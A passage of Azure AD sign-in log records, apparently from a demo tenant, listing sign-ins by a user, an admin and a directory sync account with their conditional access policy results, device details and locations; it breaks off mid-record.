+811,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd924d18-381e-43ce-a85f-006b34ca94a6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c457a232-7a13-4abd-a93c-6f0a47e00d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c457a232-7a13-4abd-a93c-6f0a47e00d00,SigninLogs,Sucess,50.6406517,5.572050095
+812,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b533d840-7ed9-4b53-8546-240707b12961,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a121923-a43a-49e3-acac-67d9ec280d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a121923-a43a-49e3-acac-67d9ec280d00,SigninLogs,Sucess,50.6406517,5.572050095
+813,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,470756b1-d632-49da-89cf-6493ec789eab,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8ccd2b23-7303-4913-b6ad-5087cda60d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,8ccd2b23-7303-4913-b6ad-5087cda60d00,SigninLogs,Sucess,50.6406517,5.572050095
+814,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6be2e835-4217-4e97-9e88-9f79534d66b2,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8ad00b2e-7523-45f8-a6db-5c47a7bc0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8ad00b2e-7523-45f8-a6db-5c47a7bc0d00,SigninLogs,Sucess,50.6406517,5.572050095
+815,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:38.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20b34019-d4f1-483e-baa8-ea13e9069319,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d3b25eb5-284d-4091-85e8-2c1110e40d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d3b25eb5-284d-4091-85e8-2c1110e40d00,SigninLogs,Sucess,50.6406517,5.572050095
+816,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ace1d4a5-fd0b-463d-bfa6-011c97aa0f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ace1d4a5-fd0b-463d-bfa6-011c97aa0f00,SigninLogs,Sucess,50.6406517,5.572050095
+817,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99740437-0725-4078-a2f9-4fbfb63c5ab8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e4ad56a4-20cd-4ec9-8d5b-ecb8d8880d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e4ad56a4-20cd-4ec9-8d5b-ecb8d8880d00,SigninLogs,Sucess,36.6404686,-78.26995087
+818,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:43.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a0cb2560-9719-4aea-a81f-b5dfdc498ff2,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 09:02,"{'operatingSystem': 'Windows 10', 